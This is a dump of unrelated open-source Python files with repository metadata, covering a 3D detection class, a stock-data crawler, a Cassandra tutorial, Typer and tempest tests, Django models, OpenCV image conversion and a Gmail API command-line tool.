def __init__(self, frame, track_id, detection_type, truncation, occlusion, obs_angle, bbox, dimensions, location, rotation_y, score):
self.frame = frame
self.track_id = track_id
# detection_type: 'Car', 'Van', 'Truck', 'Pedestrian', 'Person_sitting', 'Cyclist', 'Tram', 'Misc' or 'DontCare'
self.detection_type = detection_type
# truncated: Float from 0 (non-truncated) to 1 (truncated)
self.truncation = truncation
# occluded: integer (0,1,2,3) indicating occlusion state:
# 0 = fully visible, 1 = partly occluded, 2 = largely occluded, 3 = unknown
self.occlusion = occlusion
        # observation angle of object, ranging [-pi..pi]
self.obs_angle = obs_angle
# 2D bounding box of object in the image (0-based index): contains left, top, right, bottom pixel coordinates
self.bbox = bbox
# 3D object dimensions: height, width, length (in meters)
self.dimensions = dimensions
# 3D object location x,y,z in camera coordinates (in meters)
self.location = location
# Rotation ry around Y-axis in camera coordinates [-pi..pi]
self.rotation_y = rotation_y
self.score = score
@classmethod
def from_string_list(cls, string_list):
return cls(
frame=int(float(string_list[0])), # frame
track_id=int(float(string_list[1])), # id
detection_type=string_list[2].lower(), # object type [car, pedestrian, cyclist, ...]
truncation=float(string_list[3]), # truncation [0..1]
occlusion=int(float(string_list[4])), # occlusion [0,1,2]
obs_angle=float(string_list[5]), # observation angle [rad]
bbox=np.array([float(string_list[6]), float(string_list[7]), float(string_list[8]), float(string_list[9])], dtype=float), # left [px], top [px], right [px], bottom [px]
dimensions=np.array([float(string_list[10]), float(string_list[11]), float(string_list[12])], dtype=float), # height [m], width [m], length [m]
            location=np.array([float(string_list[13]), float(string_list[14]), float(string_list[15])], dtype=float), # x [m], y [m], z [m]
rotation_y=float(string_list[16]), # yaw angle [rad]
score=float(string_list[17]) if len(string_list) >= 18 else None
)
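

# Illustrative example (not from the original module). The field order follows a
# KITTI-tracking-style label line; every number below is made up.
if __name__ == '__main__':
    fields = ("0 1 Car 0.0 0 -1.57 100 120 300 250 "
              "1.5 1.6 3.7 2.0 1.5 15.0 0.1 0.95").split()
    det = Detection3D.from_string_list(fields)
    print(det.detection_type, det.location, det.score)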
|
[
"sebastian.bullinger@iosb.fraunhofer.de"
] |
sebastian.bullinger@iosb.fraunhofer.de
|
b649bb21ea563e3765210bd62d99d5b730a5b950
|
8fb2668de046fb47ffb3e0964746b400e75b7c83
|
/crawl/fake_spider/tushare/kData.py
|
79515c39159d08946ce04bb198cc6e7d8deaf6af
|
[] |
no_license
|
reinhardtken/backtest-py
|
5d8f080861851882d954f4bb944a8d374220498e
|
6d14b10918c018081ab228030d2b3ac38eea267c
|
refs/heads/master
| 2020-12-06T17:01:33.284011
| 2020-02-11T15:07:42
| 2020-02-11T15:07:42
| 232,512,884
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,473
|
py
|
# -*- encoding: utf-8 -*-
# sys
import json
import datetime
# thirdpart
import pandas as pd
import tushare as ts
from pymongo import MongoClient
# this project
##########################
import util.crawl as util
import const.crawl as const
#http://tushare.org/classifying.html#id8
# code  : stock code
# name  : stock name
# date  : date
# weight: weight
def getLastK(code):
end = util.today().strftime('%Y-%m-%d')
start = util.weekAgo().strftime('%Y-%m-%d')
try:
df = ts.get_k_data(code, start=start, end=end)
df.loc[:, 'date'] = pd.to_datetime(df.loc[:, 'date'])
df.set_index('date', inplace=True)
df.drop('code', axis=1, inplace=True)
return df
except Exception as e:
print(e)
def getKData(code, starts='2001-01-01'):
try:
df = ts.get_k_data(code, start=starts, index=False)
df.loc[:, 'date'] = pd.to_datetime(df.loc[:, 'date'])
df.set_index('date', inplace=True)
df.drop('code', axis=1, inplace=True)
return df
except Exception as e:
print(e)
def getKDataRecent(code):
try:
now = datetime.datetime.now()
starts = now - datetime.timedelta(days=15)
starts = starts.strftime('%Y-%m-%d')
df = ts.get_k_data(code, start=starts, index=False)
df.loc[:, 'date'] = pd.to_datetime(df.loc[:, 'date'])
df.set_index('date', inplace=True)
df.drop('code', axis=1, inplace=True)
return df
except Exception as e:
print(e)
def getKDataNoneRecent(code):
try:
now = datetime.datetime.now()
starts = now - datetime.timedelta(days=15)
starts = starts.strftime('%Y-%m-%d')
df = ts.get_k_data(code, start=starts, autype=None, index=False)
df.loc[:, 'date'] = pd.to_datetime(df.loc[:, 'date'])
df.set_index('date', inplace=True)
df.drop('code', axis=1, inplace=True)
return df
except Exception as e:
print(e)
def getKDataNone(code, starts='2001-01-01', index=False):
try:
df = ts.get_k_data(code, start=starts, autype=None, index=index)
df.loc[:, 'date'] = pd.to_datetime(df.loc[:, 'date'])
df.set_index('date', inplace=True)
df.drop('code', axis=1, inplace=True)
return df
except Exception as e:
print(e)
def saveDB(data: pd.DataFrame, code, handler=None):
def callback(result):
# handler.send_message(handler.project_name, result, self._date + '_' + result['_id'])
pass
re = util.updateMongoDB(data, util.genKeyCodeFunc('date'), const.KData.DB_NAME,
const.KData.COLLECTION_D_HEAD + code, True, callback)
# util.everydayChange(re, 'gpfh')
# this variant stores forward-adjusted ("qfq") prices
def RunOne(code, force=False):
#dblist = MongoClient.list_database_names()
client = MongoClient()
db = client['stock_all_kdata']
collectionLIst = db.list_collection_names()
if not force and code in collectionLIst:
print("exist {}".format(code))
else:
        # when forcing an update, drop the existing data first
if force and code in collectionLIst:
db.drop_collection(code)
re = getKData(code)
saveDB2(re, code)
def saveDB2(data: pd.DataFrame, code, handler=None):
def callback(result):
pass
util.updateMongoDB(data, util.genKeyCodeFunc('date'), "stock_all_kdata",
const.KData.COLLECTION_D_HEAD + code, True, callback)
# this variant stores unadjusted prices (autype=None)
def RunOneNone(code):
client = MongoClient()
db = client['stock_all_kdata_none']
collectionList = db.list_collection_names()
if code in collectionList:
print("exist {}".format(code))
else:
re = getKDataNone(code)
saveDB3(re, code)
# data for roughly the last month
def RunOneNoneRecent(code):
now = datetime.datetime.now()
starts = now - datetime.timedelta(days=31)
#starts = datetime.datetime(now.year, now.month, 1)
starts = starts.strftime('%Y-%m-%d')
re = getKDataNone(code, starts)
saveDB3(re, code)
def RunHS300IndexRecent():
now = datetime.datetime.now()
starts = now - datetime.timedelta(days=15)
# starts = datetime.datetime(now.year, now.month, 1)
starts = starts.strftime('%Y-%m-%d')
re = getKDataNone('000300', starts, index=True)
saveDB3(re, '000300')
def RunHS300Index():
re = getKDataNone('000300', starts='2001-01-01', index=True)
saveDB3(re, '000300')
def saveDB3(data: pd.DataFrame, code, handler=None):
def callback(result):
pass
util.updateMongoDB(data, util.genKeyCodeFunc('date'), "stock_all_kdata_none",
const.KData.COLLECTION_D_HEAD + code, True,
callback)
|
[
"reinhardtken@hotmail.com"
] |
reinhardtken@hotmail.com
|
4408f2da3cc0458926f976eb6d208f94a4dbb331
|
05a2097cbc167c0d8cfde5a039600c6994a34232
|
/custom/penn_state/constants.py
|
74aac3cb2025c0fd4a0abd1312f7931d10a6287f
|
[] |
no_license
|
shashanks/commcare-hq
|
9c641a4d830cd523410be150c2d341c4edbce38a
|
44c2bd56bcb746f1f6c7b624ddefbe4215fc791c
|
refs/heads/master
| 2020-12-11T06:12:36.705418
| 2013-12-17T08:35:23
| 2013-12-17T08:35:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 314
|
py
|
DOMAIN = 'psu-legacy-together'
DAILY_DATA_XMLNS = 'http://openrosa.org/formdesigner/B6E92793-CB42-449C-ACE7-99B0E65FE3AE'
COACH_RESPONSE_XMLNS = 'http://openrosa.org/formdesigner/D42C8CAB-F17C-4E9C-921C-CA47E6AECE15'
WEEKLY_SCHEDULE_XMLNS = 'http://openrosa.org/formdesigner/F2F7A739-BDEF-4D14-B60F-371AFE901B71'
|
[
"esoergel@gmail.com"
] |
esoergel@gmail.com
|
952498fe3ce65449fb818515ea9a956611e27c3a
|
37f48a90a33015a6e51d8b4ad839f5741a0c320f
|
/NoSQL_Cassandra/4_where_clause.py
|
68a612d995a381451d49b6fabe6b8caf595c9534
|
[] |
no_license
|
Hadryan/Data_Engineering
|
90376170a9a6a9700d1a1f32ea4b6efe6cdcbd98
|
f02db4f2ffb592277b44c2807884443c910725b1
|
refs/heads/master
| 2020-12-14T11:01:33.399933
| 2019-12-21T15:36:33
| 2019-12-21T15:36:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,248
|
py
|
# Since NoSQL has no JOINs, where becomes imperative
import cassandra
from cassandra.cluster import Cluster
print('create connection to database \n')
try:
cluster = Cluster(['127.0.0.1'])
session = cluster.connect()
except Exception as e:
print(e)
print('create keyspace/database \n')
try:
session.execute("""
CREATE KEYSPACE IF NOT EXISTS udacity
WITH REPLICATION = {'class':'SimpleStrategy', 'replication_factor': 1}""")
except Exception as e:
print(e)
# connect to key space
print('connect to key space \n')
try:
session.set_keyspace('udacity')
except Exception as e:
print(e)
# create table with query impression : 4 queries
# query 1 = all albums in a given year
# query 2 = album released by 'The Beatles'
# query 3 = select city from year=1970 & artist_name=The Beatles
print('create table \n')
query = "CREATE TABLE IF NOT EXISTS songs_library "
query = query + \
'(year int, artist_name text, album_name text, city text, PRIMARY KEY (year, artist_name, album_name))'
try:
session.execute(query)
except Exception as e:
print(e)
# Insert 5 rows
print('insert rows \n')
query = "INSERT INTO songs_library (year, artist_name, album_name, city)"
query = query + "values(%s, %s, %s, %s)"
try:
session.execute(query, (1970, "The Beatles", "Let It Be", 'Liverpool'))
except Exception as e:
print(e)
try:
session.execute(query, (1965, "The Beatles", "Rubber Soul", 'Oxford'))
except Exception as e:
print(e)
try:
session.execute(query, (1965, "The Who", "My Generation", 'London'))
except Exception as e:
print(e)
try:
session.execute(query, (1966, "The Monkees", "The Monkees", 'Los Angeles'))
except Exception as e:
print(e)
try:
session.execute(query, (1970, "The Carpenters",
"Close To You", 'San Diego'))
except Exception as e:
print(e)
# validate that data was inserted
print('query 1 = all albums in a given year=1970 \n')
query = "SELECT * FROM songs_library WHERE year=1970"
try:
rows = session.execute(query)
except Exception as e:
print(e)
for row in rows:
print(row.year, row.artist_name, row.album_name, row.city)
print("\n query 2 = album realeased by 'The Beatles' where year=1970 \n")
query = "SELECT * FROM songs_library WHERE year=1970 AND artist_name='The Beatles' "
try:
rows = session.execute(query)
except Exception as e:
print(e)
for row in rows:
print(row.year, row.artist_name, row.album_name, row.city)
print("\n query 3 = album released year=1970 AND artist_name='The Beatles' AND album_name='Let IT BE' \n ")
query = "SELECT city FROM songs_library WHERE year = 1970 AND artist_name = 'The Beatles' AND album_name = 'Let It Be' "
try:
rows = session.execute(query)
except Exception as e:
print(e)
for row in rows:
print(row.city)
# drop table
print("\n drop table \n")
query = "DROP TABLE songs_library"
try:
rows = session.execute(query)
except Exception as e:
print(e)
# close session & cluster connection
print('close session & connection \n')
session.shutdown()
cluster.shutdown()
|
[
"noreply@github.com"
] |
Hadryan.noreply@github.com
|
4088843b646eab6f6b40d2158cddb8ac622154dd
|
f0acc407f95b758fa734f5ed5f6506a8b20d2706
|
/tests/test_tutorial/test_options/test_name/test_tutorial004_an.py
|
087b436d55d07adedb8c0365657f3f42ab29d946
|
[
"MIT"
] |
permissive
|
shnups/typer
|
ede6d86c5b169e8caa7823b0552f8531ed041f84
|
e0b207f3f577cb2e59fdd60da39686a2f5ed0e77
|
refs/heads/master
| 2023-08-31T01:54:21.168547
| 2023-08-01T09:36:09
| 2023-08-01T09:36:09
| 313,047,732
| 0
| 0
|
MIT
| 2020-11-15T14:22:06
| 2020-11-15T14:22:05
| null |
UTF-8
|
Python
| false
| false
| 1,018
|
py
|
import subprocess
import sys
import typer
from typer.testing import CliRunner
from docs_src.options.name import tutorial004_an as mod
runner = CliRunner()
app = typer.Typer()
app.command()(mod.main)
def test_option_help():
result = runner.invoke(app, ["--help"])
assert result.exit_code == 0
assert "-n" in result.output
assert "--user-name" in result.output
assert "TEXT" in result.output
assert "--name" not in result.output
def test_call():
result = runner.invoke(app, ["-n", "Camila"])
assert result.exit_code == 0
assert "Hello Camila" in result.output
def test_call_long():
result = runner.invoke(app, ["--user-name", "Camila"])
assert result.exit_code == 0
assert "Hello Camila" in result.output
def test_script():
result = subprocess.run(
[sys.executable, "-m", "coverage", "run", mod.__file__, "--help"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
encoding="utf-8",
)
assert "Usage" in result.stdout
|
[
"noreply@github.com"
] |
shnups.noreply@github.com
|
177511eb917f0c04de3ac00852473301adffedd1
|
55c250525bd7198ac905b1f2f86d16a44f73e03a
|
/Python/Scraper/scrapy/tests/test_command_version.py
|
f8c4ac141c2766133ad886ccb9a77791d7dbb1dc
|
[
"BSD-3-Clause"
] |
permissive
|
NateWeiler/Resources
|
213d18ba86f7cc9d845741b8571b9e2c2c6be916
|
bd4a8a82a3e83a381c97d19e5df42cbababfc66c
|
refs/heads/master
| 2023-09-03T17:50:31.937137
| 2023-08-28T23:50:57
| 2023-08-28T23:50:57
| 267,368,545
| 2
| 1
| null | 2022-09-08T15:20:18
| 2020-05-27T16:18:17
| null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:73dce6f404541d9151c420cb22ff641258ce3d66e825df13aa289ff4a5c1f1ad
size 1058
|
[
"nateweiler84@gmail.com"
] |
nateweiler84@gmail.com
|
2e74d353ab354e12d997f17a482999f383cf75ab
|
68c421b58f43c82ba1f7c5b95138f76094a44f8e
|
/telemetry_tempest_plugin/scenario/test_gnocchi.py
|
e283d2f288d9f71f0080f2164111e4f39526039b
|
[
"Apache-2.0"
] |
permissive
|
NeCTAR-RC/telemetry-tempest-plugin
|
37c986541ccad951e2cd7db3394a76a58ea1ce14
|
fc990c4ada71ca3c45df2d4733bb1fb4b7f7c9e5
|
refs/heads/master
| 2021-06-27T03:24:35.519246
| 2019-05-24T06:21:57
| 2019-05-24T06:47:41
| 194,606,282
| 0
| 0
| null | 2019-07-01T05:36:00
| 2019-07-01T05:36:00
| null |
UTF-8
|
Python
| false
| false
| 1,659
|
py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
import os
from tempest import config
import tempest.test
from telemetry_tempest_plugin.scenario import utils
CONF = config.CONF
TEST_DIR = os.path.join(os.path.dirname(__file__), 'gnocchi_gabbits')
class GnocchiGabbiTest(tempest.test.BaseTestCase):
credentials = ['admin']
TIMEOUT_SCALING_FACTOR = 5
@classmethod
def skip_checks(cls):
super(GnocchiGabbiTest, cls).skip_checks()
if not CONF.service_available.gnocchi:
raise cls.skipException("Gnocchi support is required")
def _prep_test(self, filename):
token = self.os_admin.auth_provider.get_token()
url = self.os_admin.auth_provider.base_url(
{'service': CONF.metric.catalog_type,
'endpoint_type': CONF.metric.endpoint_type,
'region': CONF.identity.region})
os.environ.update({
"GNOCCHI_SERVICE_URL": url,
"GNOCCHI_SERVICE_TOKEN": token,
"GNOCCHI_AUTHORIZATION": "not used",
})
utils.generate_tests(GnocchiGabbiTest, TEST_DIR)
|
[
"sileht@sileht.net"
] |
sileht@sileht.net
|
d35548b0e453cd2577815b23e395954965d3dc5b
|
6584124fee86f79ce0c9402194d961395583d6c3
|
/blog/migrations/0008_auto_20150603_0708.py
|
3f31a14ba2dcb128cea981661d996c147b8152a8
|
[] |
no_license
|
janusnic/webman
|
fdcffb7ed2f36d0951fd18bbaa55d0626cd271e1
|
2e5eaadec64314fddc19f27d9313317f7a236b9e
|
refs/heads/master
| 2018-12-28T18:21:00.291717
| 2015-06-05T11:49:00
| 2015-06-05T11:49:00
| 35,676,834
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,550
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import blog.models
class Migration(migrations.Migration):
dependencies = [
('blog', '0007_page'),
]
operations = [
migrations.CreateModel(
name='Slide',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('status', models.CharField(default=b'0', max_length=1, choices=[(b'0', b'Dratf'), (b'1', b'Published'), (b'2', b'Not Published')])),
('title', models.CharField(max_length=32)),
('description', models.TextField(null=True, blank=True)),
('image', models.ImageField(max_length=1024, null=True, upload_to=blog.models.get_blog_file_name, blank=True)),
],
),
migrations.CreateModel(
name='Slider',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('status', models.CharField(default=b'0', max_length=1, choices=[(b'0', b'Dratf'), (b'1', b'Published'), (b'2', b'Not Published')])),
('title', models.CharField(max_length=32)),
('description', models.TextField(null=True, blank=True)),
],
),
migrations.AddField(
model_name='slide',
name='related_slider',
field=models.ForeignKey(to='blog.Slider'),
),
]
|
[
"janusnic@gmail.com"
] |
janusnic@gmail.com
|
6e62b6a94f556f56721f4c83e23b79e90a9d3e9e
|
9d01e03d2e1ff388aad8331280892192e02c0f9d
|
/limix_genetics/test/test_mvnorm.py
|
3fe54045b300c7d796064df3b8d5a0c6ef22f528
|
[
"MIT"
] |
permissive
|
limix/limix-genetics
|
a1dd7e18f55ce62265ca3deaeac0b83ff71239d8
|
9c69a59a61e030243a9f865a7f7ae8842859eaee
|
refs/heads/master
| 2021-01-20T11:00:16.974644
| 2017-02-14T13:26:48
| 2017-02-14T13:26:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 364
|
py
|
from limix_genetics import mvn_ecdf, mvn_eicdf
from numpy.testing import assert_allclose
def test_mvnorm():
x = [1, 2]
mean = [1.0, -0.3]
cov = [[1.5, 0.2],
[0.2, 0.7]]
cdf = mvn_ecdf(x, mean, cov)
icdf = mvn_eicdf(cdf, mean, cov)
assert_allclose(cdf, 0.98032128770733662)
assert_allclose(cdf, mvn_ecdf(icdf, mean, cov))
|
[
"danilo.horta@gmail.com"
] |
danilo.horta@gmail.com
|
7aa31be9cc6026eb4f8b0ce8c4e7e1636d024a8f
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/50/usersdata/134/19167/submittedfiles/contido.py
|
0def95c7b5340172307b304f557314328b69cd1f
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 470
|
py
|
# -*- coding: utf-8 -*-
from __future__ import division
n = input('Quantidade de elementos de a:')
a = []
for i in range(0,n,1):
a.append(input('Digite um valor:'))
m = input('Quantidade de elementos de b:')
b = []
for i in range(0,m,1):
b.append(input('Digite um valor:'))
cont = 0
def lista(a):
a[0]
for i in range (0,len(a),1):
a[i]
return a[i]
cont = 0
if lista(a)==lista(b):
cont = cont + 1
print cont
cont
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
0e56bf8ed73462e6d8d4224877b8ef90282c3bfe
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/otherforms/_managing.py
|
c3d2619519ac3dfd32082a1f69f6bfb2869a39aa
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 224
|
py
|
# class header
class _MANAGING():
    def __init__(self):
        self.name = "MANAGING"
        self.definitions = 'manage'
        self.parents = []
        self.childen = []
        self.properties = []
        self.jsondata = {}
        self.basic = ['manage']
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
34d9075fcb8f6a7780fc543fbf024cec7ef1ce6c
|
d05c946e345baa67e7894ee33ca21e24b8d26028
|
/general/gmail-api/gmail_api.py
|
3ff3265516251943f18ce1f75b9483a7152eb03e
|
[
"MIT"
] |
permissive
|
x4nth055/pythoncode-tutorials
|
327255550812f84149841d56f2d13eaa84efd42e
|
d6ba5d672f7060ba88384db5910efab1768c7230
|
refs/heads/master
| 2023-09-01T02:36:58.442748
| 2023-08-19T14:04:34
| 2023-08-19T14:04:34
| 199,449,624
| 1,858
| 2,055
|
MIT
| 2023-08-25T20:41:56
| 2019-07-29T12:35:40
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 2,348
|
py
|
# for parsing commandline arguments
import argparse
from common import search_messages, gmail_authenticate
from read_emails import read_message
from send_emails import send_message
from delete_emails import delete_messages
from mark_emails import mark_as_read, mark_as_unread
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Send/Search/Delete/Mark messages using gmail's API.")
subparsers = parser.add_subparsers(help='Subcommands')
parser_1 = subparsers.add_parser('send', help='Send an email')
parser_1.add_argument('destination', type=str, help='The destination email address')
parser_1.add_argument('subject', type=str, help='The subject of the email')
parser_1.add_argument('body', type=str, help='The body of the email')
parser_1.add_argument('files', type=str, help='email attachments', nargs='+')
parser_1.set_defaults(action='send')
parser_2 = subparsers.add_parser('delete', help='Delete a set of emails')
parser_2.add_argument('query', type=str, help='a search query that selects emails to delete')
parser_2.set_defaults(action='delete')
parser_3 = subparsers.add_parser('mark', help='Marks a set of emails as read or unread')
parser_3.add_argument('query', type=str, help='a search query that selects emails to mark')
parser_3.add_argument('read_status', type=bool, help='Whether to mark the message as unread, or as read')
parser_3.set_defaults(action='mark')
    parser_4 = subparsers.add_parser('search', help='Search for emails matching a query and display them')
parser_4.add_argument('query', type=str, help='a search query, which messages to display')
parser_4.set_defaults(action='search')
args = parser.parse_args()
service = gmail_authenticate()
if args.action == 'send':
        # TODO: add attachments
send_message(service, args.destination, args.subject, args.body, args.files)
elif args.action == 'delete':
delete_messages(service, args.query)
elif args.action == 'mark':
        print(args.read_status)
if args.read_status:
mark_as_read(service, args.query)
else:
mark_as_unread(service, args.query)
elif args.action == 'search':
results = search_messages(service, args.query)
for msg in results:
read_message(service, msg)
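
# Illustrative invocations (addresses, queries and attachments are made up):
#   python gmail_api.py send someone@example.com "Subject" "Body text" report.pdf
#   python gmail_api.py search "from:someone@example.com"
#   python gmail_api.py mark "subject:newsletter" true
#   python gmail_api.py delete "older_than:1y"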
|
[
"fullclip@protonmail.com"
] |
fullclip@protonmail.com
|
432e3093767c4cbbc0c3e171e6b78a3877a04112
|
1fbf79261b27e4f62e2575ec702b1e6ae5820939
|
/Python/0131_04_---파이썬---.py
|
4c3964919a9ce158ff0be340ed85795975721ba4
|
[] |
no_license
|
sunnyhyo/big_data
|
9512dafccddf20a9ab91d5fe45598334cfe69d20
|
b4e2a3d0cbd690c4b773fcbe28bd5983bfd03d58
|
refs/heads/master
| 2021-05-02T14:38:39.332507
| 2018-03-03T06:45:37
| 2018-03-03T06:45:37
| 120,723,356
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 232
|
py
|
ss=input('문자열 입력==>')
print('출력 문자열==>', end="") ## end="" keeps the output on the same line ##
if ss.startswith('---')==False:
print("---", end="")
print(ss, end="")
if ss.endswith('---')==False:
print("---",end='')
|
[
"sunnyhyo77@gmail.com"
] |
sunnyhyo77@gmail.com
|
4d8c9e72253b36357ac9da790ac0470411996637
|
64c5341a41e10ea7f19582cbbf3c201d92768b9f
|
/webInterface/webInterface/aligner_webapp/alignworker/converters/__init__.py
|
0e064af14769dfc7fe765fe1bd5b633c0724dfa8
|
[] |
no_license
|
CLARIN-PL/yalign
|
6b050b5c330b8eaf7e1e2f9ef83ec88a8abe5164
|
6da94fbb74e803bea337e0c171c8abff3b17d7ee
|
refs/heads/master
| 2023-06-10T18:30:42.112215
| 2021-06-24T13:07:17
| 2021-06-24T13:07:17
| 51,368,327
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,508
|
py
|
import os
import logging
import shutil
import subprocess
import tempfile
from alignworker.tmp import get_temp_file
from .tokenizer import tokenize
from .detokenizer import detokenize
from .tmxconverter import to_tmx
from .tsvconverter import to_tsv
log = logging.getLogger(__name__)
def doc_to_plaintext(path):
"""TODO: Docstring for doc_to_plaintext.
:path: TODO
:returns: TODO
"""
out_path = get_temp_file()
if not(path.endswith('.doc') or path.endswith('.docx') or path.endswith('.odt')):
shutil.copyfile(path, out_path)
return out_path
log.info('Converting doc into text file from "%s" to "%s"', path, out_path)
tmp_dir = tempfile.mkdtemp(suffix='_doc_to_text_')
subprocess.call([
'soffice',
'--headless',
'--convert-to',
'txt:Text',
'--outdir',
tmp_dir,
path
])
try:
dirpath, _, filenames = next(os.walk(tmp_dir))
converted_path = os.path.join(dirpath, filenames[0])
shutil.copyfile(converted_path, out_path)
shutil.rmtree(tmp_dir)
except IndexError:
shutil.copyfile(path, out_path)
return out_path
def norm_utf8(path):
"""TODO: Docstring for norm_utf8.
:path: TODO
:returns: TODO
"""
out_path = get_temp_file()
with open(out_path, 'w', encoding='utf-8') as f:
with open(path, encoding='utf-8', errors='replace') as in_f:
for rec in in_f:
f.write(rec)
return out_path
|
[
"krzysztof@wolk.pl"
] |
krzysztof@wolk.pl
|
8f4305a715b7001f035cd96c718cd3ab7f10925d
|
05fa3773bb72a267d83b43819440c907a8fc80c3
|
/picarus/vision/video_combined_features.py
|
d22ed8765e0e8ec2a7110cec67f1c3046b98e8a7
|
[] |
no_license
|
objects-in-space-and-time/picarus
|
91ce2ac87a3acd84603996cf0e2c4f3df0a6e49e
|
04745c47396891d97dc7ad3752ebce5c9b79f33a
|
refs/heads/master
| 2020-03-27T06:01:28.562484
| 2012-12-05T07:50:16
| 2012-12-05T07:50:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 685
|
py
|
import video_raw_features
import video_block_features
import sys
import hadoopy
class Mapper(object):
def __init__(self):
self.b = video_block_features.Mapper()
self.r = video_raw_features.Mapper()
def map(self, event_filename, video_data):
hadoopy.counter('CombinedFeatures', 'DontHave')
sys.stderr.write('%s\n' % str(event_filename))
for event_filename, features in self.r.map(event_filename, video_data):
sys.stderr.write('%s\n' % str(event_filename))
for x in self.b.map(event_filename, features):
yield x
if __name__ == '__main__':
hadoopy.run(Mapper, video_block_features.Reducer)
|
[
"bwhite@dappervision.com"
] |
bwhite@dappervision.com
|
adfbe0b6910b3dfc436ae935c24ba4d89ef0505a
|
621fec63ba65d000f8f539bd6b5238202e35644b
|
/blackandwhite.py
|
3fc6f0dbcfad81e78d41f6f3d4d88542996a6f7d
|
[
"MIT"
] |
permissive
|
DiptoChakrabarty/ImageColrization
|
f764cffe82183ce951c130aa0d9af0e5c80eca48
|
c0cd1ae59ad99bced57b34376ce3191a1c2241a8
|
refs/heads/master
| 2021-01-01T12:45:54.964214
| 2020-02-24T17:09:19
| 2020-02-24T17:09:19
| 239,286,196
| 0
| 0
| null | 2020-02-09T11:00:26
| 2020-02-09T10:37:02
|
Python
|
UTF-8
|
Python
| false
| false
| 489
|
py
|
import cv2
import os
import numpy as np
path="./colored"
upload="./black"
colored=list(os.path.join(path,f) for f in os.listdir(path))
count=0
for images in colored:
count+=1
photo=cv2.imread(images)
resized=cv2.resize(photo,(400,350))
cv2.imwrite(images,resized)
cv2.imshow("lakes",photo)
cv2.waitKey()
cv2.destroyAllWindows()
dest=upload + "/image{}.png".format(count)
black=cv2.cvtColor(resized,cv2.COLOR_BGR2GRAY)
cv2.imwrite(dest,black)
|
[
"diptochuck123@gmail.com"
] |
diptochuck123@gmail.com
|
7fa051e8b4c4f78f4441293efc92b534c2a08c5c
|
c751562ea538476464a13a281f321cbfebf89b76
|
/python_stack/Django with Ajax/demos/main/apps/ajax_notes/models.py
|
c38bde3a9a7e020ce7189fdb85397987dfb674e6
|
[] |
no_license
|
brizjose/JBCodingDojo
|
7e598419c0e090be4a92f7c3e80323daa9b4bb26
|
fc161de86995d285bb5b2c39e28e9adbe04faebc
|
refs/heads/master
| 2020-03-21T09:31:02.402139
| 2019-02-18T03:45:22
| 2019-02-18T03:45:22
| 138,403,753
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 938
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
# Create your models here.
class NoteManager(models.Manager):
def CreateNote(self, context):
messages = []
if context['title'] == "":
messages.append("Title cannot be blank, please insert title")
if context['content'] == "":
messages.append("Note content cannot be blank, please insert content")
if len(messages) == 0:
Note.objects.create(title=context['title'], content=context['content'])
new_note = Note.objects.last().id
return(True, new_note)
else:
return(False, messages)
class Note(models.Model):
title = models.CharField(max_length=255)
content = models.TextField()
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
objects = NoteManager()
|
[
"brizjosem@gmail.com"
] |
brizjosem@gmail.com
|
b37de808e75120539eb4dc6c91fd2b891811f745
|
4e8cab639ddfa3e791b5b3a08aa491fb92c1ecaa
|
/Python_PostgresSQL/Python Refresher/destructuring_variables.py
|
070fb9609470e6f1b01a01bdf420cd7ba46e0835
|
[] |
no_license
|
LesediSekakatlela/SQL_projects
|
49b91bebdf6f9b1176c40c3752232ab8d3d091dd
|
9c78fc027dd137ef96446ea0946343293f3be007
|
refs/heads/main
| 2023-07-13T02:41:41.261558
| 2021-08-20T09:03:23
| 2021-08-20T09:03:23
| 386,646,245
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 440
|
py
|
t = 5, 11
x, y = t
print(x, y)
#2
students_attendance = {"Rolf": 96, "Bob": 80, "Anne": 100}
